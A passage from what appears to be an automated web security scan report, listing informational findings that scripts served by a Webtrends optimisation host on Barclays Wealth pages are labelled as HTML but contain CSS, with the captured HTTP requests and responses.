1e78c2c8f9df5487f2e307677b4db3f33f947fb24b11a8261a57f7b12d8cb9adb1e535921aaa642aa50f12fa52522ae6f3b52a486dfd1ec7765f935ab3b41aa84f8df46f6b87de6ac55335e82496e147a946d1539c6e5e8e0b30c319ab3c8a0f61b1b236c14ac017d9627f463905cfaad2e9d53966c1ecb989de9efddfb3b1123b4ee4d7cbc3880c040fc45d3742c7738d1e567e67dc458d0bedf6a5e043dc7e4a48a52b25432a2b9a310b3f2627e5ef71719766274a6742423855c4931d9b98a5b87abe04298873bd3c40457c68eae7bf35095e1714b92b84e3c2ad178818519cdc2316ac1392490ef873ffc707cca523fc8ee36f5f1e67e925f4aa1d283d0325c8c56a1e47d43f99a0f43ea796f7f40dd833a7465472502ad891110f0a0151bee2471c0f84b58b450312e9e5b5418004b619188fc1edcde2625c7a13b64fc22f042a3efb50b37b9d86fa9d0c3e30a60e9948d4d0b9eac6733d563d5df7ca0498175aa0fbd95cbbc4f628df8aae8f2a1e0eaa52782526486f0a61b77ea67db20c8d4845316d9d20cf71409509428d35685d52a1423fc302171bcb84cf4ff74fd6f246e8f5d791a92f2fe93dfe938773c64272009faa7d68ca7c0f49bb1f1a2fdef143a8adb3ae4dc4036f0c8317049b7a9083abcdaec6716fe0ee4f4ec8c173d4ac1cc72ea3890a39322a4be87dc7aaf6d620bd7b6d3946133b941e1b131dd299c0ef3c312880c81557dc6e15b28b807c3561817a7f1ca2f88092f64122968672c187d7263f2a0087b709b249d079c5ad49f1a54f931cf9f5c0a5d650a537fcc0c2d98543a9dd14af7cab4197893c6db543ee8518d347ab6ef1bf4be4b56110d9e87c10b4724acdabd52da707d75ebd702e6eefe3588f781210a63dc34ff9fd94e78bb948ca584777a13e7fa26fc5f01741322c2c8f4939c2afa54d36a5129d9cb2de40cd6058eab5b9fdb0549ef065242a118bc52777bd32bf200b7236393f6d170b061d706533019c1bf2e48006700c716d1ea51f7f7e0e6895f8562a51c0a7ba1a879a749d8616a3aab60307856c320d98646317ae5b1c9fcdb56433c6dcf0efb68ab843a27d44d8aa3e83e8153e3bcff95bf2e0bf885b6920b8b2a339d81b4abe7bd9941d0e06b0e76ed70797a730b79e8deed61347b883d2b22ac3a1c79f00f9213c HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/i-alert.htm?WT.mc_id=int_q3_ialert_bwi&WT.mc_ev=click
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=6470427122C0BC6EEE06A97043357700; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a031a36ee; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d02420171; _wt.mode-79569=fcdcc722e93200db2e76

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:31:32 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: _wt.mode-79569=fcdcc722e9320578927c; Path=/
Set-Cookie: _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a05d2312f; Expires=Sun, 01-Jan-2012 00:31:32 GMT; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 44561


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...
28.47. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392de0828a56481f5b29398c944586ea2b69577da9d14849ca3810ba1be51a94485c3b8d0df1139a67ca57bdad2954a81df26e54b2515e10536c19069a4897652328a51ea4f9befe56dba76741e6d873e633a9c1581835bbbeffefeadd0dba214499d00aacba2b2e2c7b20f4f61bd3986191a223c0d8e58ce23a4f38a25f3f815e425df5eb151ca719121e4ce12004ad271c68e5605a7f1b5afc5d9b38d752a7fbf8e53656e8a18bdf9f1fd25ae761ed3c7dec882b3b64609e6a6e20dbcfbcdb912759d584f823b5185ca4150ce4959a07dcff5ac53a16139211b0cb556cd69fb48a1dcba5d60771222daaf009b778966d228b012178fdd609edcf90d5924bf310972473f54a1ffc20583ba6b3c76a1733f00ac936579c56bdb60da65a9ef207789fc91bb93a6ca847c3b11dee47cf4582777ca82607b566da1ccb2577e7ff60f776ea0bc0772d236b5b8ef7c1e2c6306ac6e7b88fc498f8daaab51f3745e9cfd5c28b0d1116df17661c831bd959042170df5ec141aebdb6ee4da1566113a43522133d3e922a0e28352de9bb7b79913728403e1c15281ad2f97588dcfce239bd457a9c3ca7557d013f35a7f6b72001451715e97fd4ebcaf31add005285de6850bb18900d4dbe6beaa94189bc67bc88a5750e4331e67ae6a55d2f300c209e966a4d18d3699bf2f63ea793a2f40d8031a415567c002bdfc2155d585655b5e04e1c58d5e789155d17bdb2e54f8000b143498dcebecde1605e281ab74d927a082f6bf90ab82d9882aece0c3162f2099b49da80b9ef92723e536959fdc850cb4e07a2ae8f5bbb99fb74d8dba4897f1e5aa8062a237f493e0e64b07ef078b1038e4a1e3130cb25cf2319900c44de2f764c6bef0421955c4f5e8dd2c504a247d0f349a1e584f8ac7d0ffc7ef1dffb24897265558bae05139d380152ea441b7889a214f8f0ecfc1c9752605ad611539622c584a295ffc7203bbee24d48dadb32b7ce75e446d29e027e632d5af13eabe8b09e7bea262e721b4d2f96441e1d13cedcc2886e635096884c16f43354d3ce803f3443f42d6443b3aa8a9fa44673c2d67295d182706d2f5583be0aea42df2e90a24ef5f7499411aaf594f6d350a430a0cac08f8f1fa08a15f92baf469cd86763b117ee831bd843fb6bfcec42b7e6694189b52213b37c18caff862fa7018105b92a263ab9e60f8b294246f039914cbee6d7decfab539f554220b53b23a13fcbe41e026c2c7e884f68c4aaf14d37a74195c1e1d81799604df4aed9cad925ad8a732f3a49dcd23e31da0ffa645420703b2e6e0f0e024e206e6307ca14f2a980042409206415ff162d62063a86e3414c1f8cb1e15bd2cc689d8a1aacabac0f0bd22d7a4ca40c2451a6000d97dfb62964c0c0a5e8bac6f60f020ab845  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392de0828a56481f5b29398c944586ea2b69577da9d14849ca3810ba1be51a94485c3b8d0df1139a67ca57bdad2954a81df26e54b2515e10536c19069a4897652328a51ea4f9befe56dba76741e6d873e633a9c1581835bbbeffefeadd0dba214499d00aacba2b2e2c7b20f4f61bd3986191a223c0d8e58ce23a4f38a25f3f815e425df5eb151ca719121e4ce12004ad271c68e5605a7f1b5afc5d9b38d752a7fbf8e53656e8a18bdf9f1fd25ae761ed3c7dec882b3b64609e6a6e20dbcfbcdb912759d584f823b5185ca4150ce4959a07dcff5ac53a16139211b0cb556cd69fb48a1dcba5d60771222daaf009b778966d228b012178fdd609edcf90d5924bf310972473f54a1ffc20583ba6b3c76a1733f00ac936579c56bdb60da65a9ef207789fc91bb93a6ca847c3b11dee47cf4582777ca82607b566da1ccb2577e7ff60f776ea0bc0772d236b5b8ef7c1e2c6306ac6e7b88fc498f8daaab51f3745e9cfd5c28b0d1116df17661c831bd959042170df5ec141aebdb6ee4da1566113a43522133d3e922a0e28352de9bb7b79913728403e1c15281ad2f97588dcfce239bd457a9c3ca7557d013f35a7f6b72001451715e97fd4ebcaf31add005285de6850bb18900d4dbe6beaa94189bc67bc88a5750e4331e67ae6a55d2f300c209e966a4d18d3699bf2f63ea793a2f40d8031a415567c002bdfc2155d585655b5e04e1c58d5e789155d17bdb2e54f8000b143498dcebecde1605e281ab74d927a082f6bf90ab82d9882aece0c3162f2099b49da80b9ef92723e536959fdc850cb4e07a2ae8f5bbb99fb74d8dba4897f1e5aa8062a237f493e0e64b07ef078b1038e4a1e3130cb25cf2319900c44de2f764c6bef0421955c4f5e8dd2c504a247d0f349a1e584f8ac7d0ffc7ef1dffb24897265558bae05139d380152ea441b7889a214f8f0ecfc1c9752605ad611539622c584a295ffc7203bbee24d48dadb32b7ce75e446d29e027e632d5af13eabe8b09e7bea262e721b4d2f96441e1d13cedcc2886e635096884c16f43354d3ce803f3443f42d6443b3aa8a9fa44673c2d67295d182706d2f5583be0aea42df2e90a24ef5f7499411aaf594f6d350a430a0cac08f8f1fa08a15f92baf469cd86763b117ee831bd843fb6bfcec42b7e6694189b52213b37c18caff862fa7018105b92a263ab9e60f8b294246f039914cbee6d7decfab539f554220b53b23a13fcbe41e026c2c7e884f68c4aaf14d37a74195c1e1d81799604df4aed9cad925ad8a732f3a49dcd23e31da0ffa645420703b2e6e0f0e024e206e6307ca14f2a980042409206415ff162d62063a86e3414c1f8cb1e15bd2cc689d8a1aacabac0f0bd22d7a4ca40c2451a6000d97dfb62964c0c0a5e8bac6f60f020ab845

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392de0828a56481f5b29398c944586ea2b69577da9d14849ca3810ba1be51a94485c3b8d0df1139a67ca57bdad2954a81df26e54b2515e10536c19069a4897652328a51ea4f9befe56dba76741e6d873e633a9c1581835bbbeffefeadd0dba214499d00aacba2b2e2c7b20f4f61bd3986191a223c0d8e58ce23a4f38a25f3f815e425df5eb151ca719121e4ce12004ad271c68e5605a7f1b5afc5d9b38d752a7fbf8e53656e8a18bdf9f1fd25ae761ed3c7dec882b3b64609e6a6e20dbcfbcdb912759d584f823b5185ca4150ce4959a07dcff5ac53a16139211b0cb556cd69fb48a1dcba5d60771222daaf009b778966d228b012178fdd609edcf90d5924bf310972473f54a1ffc20583ba6b3c76a1733f00ac936579c56bdb60da65a9ef207789fc91bb93a6ca847c3b11dee47cf4582777ca82607b566da1ccb2577e7ff60f776ea0bc0772d236b5b8ef7c1e2c6306ac6e7b88fc498f8daaab51f3745e9cfd5c28b0d1116df17661c831bd959042170df5ec141aebdb6ee4da1566113a43522133d3e922a0e28352de9bb7b79913728403e1c15281ad2f97588dcfce239bd457a9c3ca7557d013f35a7f6b72001451715e97fd4ebcaf31add005285de6850bb18900d4dbe6beaa94189bc67bc88a5750e4331e67ae6a55d2f300c209e966a4d18d3699bf2f63ea793a2f40d8031a415567c002bdfc2155d585655b5e04e1c58d5e789155d17bdb2e54f8000b143498dcebecde1605e281ab74d927a082f6bf90ab82d9882aece0c3162f2099b49da80b9ef92723e536959fdc850cb4e07a2ae8f5bbb99fb74d8dba4897f1e5aa8062a237f493e0e64b07ef078b1038e4a1e3130cb25cf2319900c44de2f764c6bef0421955c4f5e8dd2c504a247d0f349a1e584f8ac7d0ffc7ef1dffb24897265558bae05139d380152ea441b7889a214f8f0ecfc1c9752605ad611539622c584a295ffc7203bbee24d48dadb32b7ce75e446d29e027e632d5af13eabe8b09e7bea262e721b4d2f96441e1d13cedcc2886e635096884c16f43354d3ce803f3443f42d6443b3aa8a9fa44673c2d67295d182706d2f5583be0aea42df2e90a24ef5f7499411aaf594f6d350a430a0cac08f8f1fa08a15f92baf469cd86763b117ee831bd843fb6bfcec42b7e6694189b52213b37c18caff862fa7018105b92a263ab9e60f8b294246f039914cbee6d7decfab539f554220b53b23a13fcbe41e026c2c7e884f68c4aaf14d37a74195c1e1d81799604df4aed9cad925ad8a732f3a49dcd23e31da0ffa645420703b2e6e0f0e024e206e6307ca14f2a980042409206415ff162d62063a86e3414c1f8cb1e15bd2cc689d8a1aacabac0f0bd22d7a4ca40c2451a6000d97dfb62964c0c0a5e8bac6f60f020ab845 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/brokerage.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=1DB1B8506FA734F3D0691621AC32919E; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a025a8920; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d02b1d29a; _wt.mode-79569=fcdcc722e93202cf02d7

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:10 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=245968D340BB5968593028CAA74B029E; Path=/ots
Set-Cookie: _wt.mode-79569=fcdcc722e932033a5f6d; Path=/
Set-Cookie: _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a05651019; Expires=Sun, 01-Jan-2012 00:02:11 GMT; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 44561


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...
28.48. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392de0828a56481f5b29398c944586ea2b69577da9d14849ca3810ba1be51a94485c3b8d0df1139a67ca57bdad2954a81df26e54b2515e10536c19069a4897652328a51ea4f9befe56dba76741e6d873e633a9c1581835bbbeffefeadd0dba214499d00aacba2b2e2c7b20f4f61bd3986191a223c0d8e58ce23a4f38a25f3f815e425df5eb151ca719121e4ce12004ad271c68e5634a7f054ba3498f73914ebeb4a7b43817e4a18fdd93098342a6389f2866e08f3e2e75638d737d198594ecd0cb755bca9cf478e40640a4400dacda9d56d8e247c53b46449047ebc45b62d489ac921adcd1b2097f4226a4de10944e8169319c042664cece1cf1de9bc4844c947cbb2366e05715c017443ba29ce8751730be12d1255f915ab3b50ca55b9ce8187d9ecf1da2246ca847d1bf13bf5dc051b6546dbf2d4dad7e8c1acc3530e9f11df75ceb12cc34353b784491f7c1e2cf3d6cc6e3bc92db9afadca8b91f3645e7d7cac0890b131adf1666129b04db5b02237cdf5fc14fb6a2a5e043dc564b12bd3a620b252d8d3613373433f6b9797f933b28413e12012614aff95f89c5f2a321a556699232da5557002622ffeeaf331e5a1517ef7dd8ebcbf314c51f4d9ac13351a216800c1db0659fa269bbc251edd7f5315d5879ad3e01d0bd06  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392de0828a56481f5b29398c944586ea2b69577da9d14849ca3810ba1be51a94485c3b8d0df1139a67ca57bdad2954a81df26e54b2515e10536c19069a4897652328a51ea4f9befe56dba76741e6d873e633a9c1581835bbbeffefeadd0dba214499d00aacba2b2e2c7b20f4f61bd3986191a223c0d8e58ce23a4f38a25f3f815e425df5eb151ca719121e4ce12004ad271c68e5634a7f054ba3498f73914ebeb4a7b43817e4a18fdd93098342a6389f2866e08f3e2e75638d737d198594ecd0cb755bca9cf478e40640a4400dacda9d56d8e247c53b46449047ebc45b62d489ac921adcd1b2097f4226a4de10944e8169319c042664cece1cf1de9bc4844c947cbb2366e05715c017443ba29ce8751730be12d1255f915ab3b50ca55b9ce8187d9ecf1da2246ca847d1bf13bf5dc051b6546dbf2d4dad7e8c1acc3530e9f11df75ceb12cc34353b784491f7c1e2cf3d6cc6e3bc92db9afadca8b91f3645e7d7cac0890b131adf1666129b04db5b02237cdf5fc14fb6a2a5e043dc564b12bd3a620b252d8d3613373433f6b9797f933b28413e12012614aff95f89c5f2a321a556699232da5557002622ffeeaf331e5a1517ef7dd8ebcbf314c51f4d9ac13351a216800c1db0659fa269bbc251edd7f5315d5879ad3e01d0bd06

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392de0828a56481f5b29398c944586ea2b69577da9d14849ca3810ba1be51a94485c3b8d0df1139a67ca57bdad2954a81df26e54b2515e10536c19069a4897652328a51ea4f9befe56dba76741e6d873e633a9c1581835bbbeffefeadd0dba214499d00aacba2b2e2c7b20f4f61bd3986191a223c0d8e58ce23a4f38a25f3f815e425df5eb151ca719121e4ce12004ad271c68e5634a7f054ba3498f73914ebeb4a7b43817e4a18fdd93098342a6389f2866e08f3e2e75638d737d198594ecd0cb755bca9cf478e40640a4400dacda9d56d8e247c53b46449047ebc45b62d489ac921adcd1b2097f4226a4de10944e8169319c042664cece1cf1de9bc4844c947cbb2366e05715c017443ba29ce8751730be12d1255f915ab3b50ca55b9ce8187d9ecf1da2246ca847d1bf13bf5dc051b6546dbf2d4dad7e8c1acc3530e9f11df75ceb12cc34353b784491f7c1e2cf3d6cc6e3bc92db9afadca8b91f3645e7d7cac0890b131adf1666129b04db5b02237cdf5fc14fb6a2a5e043dc564b12bd3a620b252d8d3613373433f6b9797f933b28413e12012614aff95f89c5f2a321a556699232da5557002622ffeeaf331e5a1517ef7dd8ebcbf314c51f4d9ac13351a216800c1db0659fa269bbc251edd7f5315d5879ad3e01d0bd06 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/about-us.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=2D0CE6DA7B82936A31CBC9ACE233AAA7; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c73ae63744334ae8cef4967d1912276c4668924ff5e00a6078cb239e3f1b573242cbd9b707a451092fc680a56b548caeb5a3f96f49b427787e772f8662a4191929dc9447c4758dd37c9d02690b0b; _wt.mode-79569=fcdcc722e93200beff43; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a00d8b959

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:06 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=699E9E21874BEC698EE100FEE3749834; Path=/ots
Set-Cookie: _wt.mode-79569=fcdcc722e932047ca940; Path=/
Set-Cookie: _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a025a8920; Expires=Sun, 01-Jan-2012 00:02:06 GMT; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 44561


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...
28.49. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392de0828a56481f5b29398c944586ea2b69577da9d14849ca3810ba1be51a94485c3b8d0df1139a67ca57bdad2954a81df26e54b2515e10536c19069a4897652328a51ea4f9befe56dba76741e6d873e633a9c1581835bbbeffefeadd0dba214499d00aacba2b2e2c7b20f4f61bd3986191a223c0d8e58ce23a4f38a25f3f815e425df5eb151ca719121e4ce12004ad271c68e56b4664154de05d88349654b2faf5f17400eebc8ad58213ce16bc76e20e58ddb0521b5346b74a4c0b939fab858b3845c5caa275bc4214e60652fa9aa826b79c23b45e6234f1698d945b37d393f4800dc3a2a9476e2d5ed2d305ea49962b64c3436639f0bf7addb8f9b9e12c8519ea7235d21c5abd3d7908bbb3cb7f0a2af95a84640afa25d7ce67c628fb921a16d88849f87d3fc71f87e7419344c94c9c1323fe7456a364ce5d8d6724f1fd739c1cac4a83263f2979488ce483ba917a1990a0ecd4c893e99feff5432c51f3a68c87965f494d925c31489802d15f032f689206a648a9d2f7bc0dfa475111832c2541355de16a1f3c2678feb3792b9330741c6017413d02c6951bccc9a8b82de25772df23e13f44417b6eede2ee36065d431eea7dd3b7cba811de4f509edd201df746c4470dae7efd9506c5a523fe8eef3b5a4362e076fcf94d7c3b0474c9933a1b478b3ecbf1f03da2c7f2ab59dc60a3145422052fdbcd470b595d50e9e319190f85e380470d46bbe2e34f825cb0104cd4c0be9de734592e19b94bc22f0b7b34a958b37a9b82f9c8006566f05e9b1fdbd5efb8c0706b546f5df1cc09994c53f2fddb5cbdcfad20dd8caeda6a0a4ac96042564e322c0327bb23e135a765e65c523e35de2ade710f970e16d92f714c3ee1053f915e48588cd29a5af840cdf54cf4b683f7a12656af63a3d9f82b84283f5dd7ae121b8672173481535773dfe64beff9fba901c207770e811752977a9fdea3c2edd93705d9ae0b159bd52ac2ab088e34cee34d2867335ae73ec5b1f58329b27d63394c19348f4c051a0496dcceb42c2033cada7f18ce724eefde8062313b83757f5babedd5c5f14625c7812596dbd375692a55d3ba0de51fcb6782c458b2bd098141e8ee93f98552ab24ffd09783844bfcdf15ad2cfd41cd8a6a6ce410e38848d815fa6da7e345e4b46612ddbf7614bf714fcaa8d77bf303d453ed252d68b9b40fdc2c4715a768c049eae0878fcdfe0593004576ef3020a76c9eb01955607d2ddf183796f9a11232a0449899e98d449b371fa7a188cad976fad6267b3b4ad8df3963d05af9355e2323627f650a5b0315763e3e50cb1bf4f9d20d770827621faf142f690d6b91fe55225cc1f9ea56879a729cd74ba8a4ba5648d17d7d1af5032e00a0095a93d6bd7364c4cbf5bda0ddbf14f07d45d8f335d1af007900a7ba1bfee0ff8b186837a2a5cd569c5605b9249e02cf94a7  previous  next

Summary

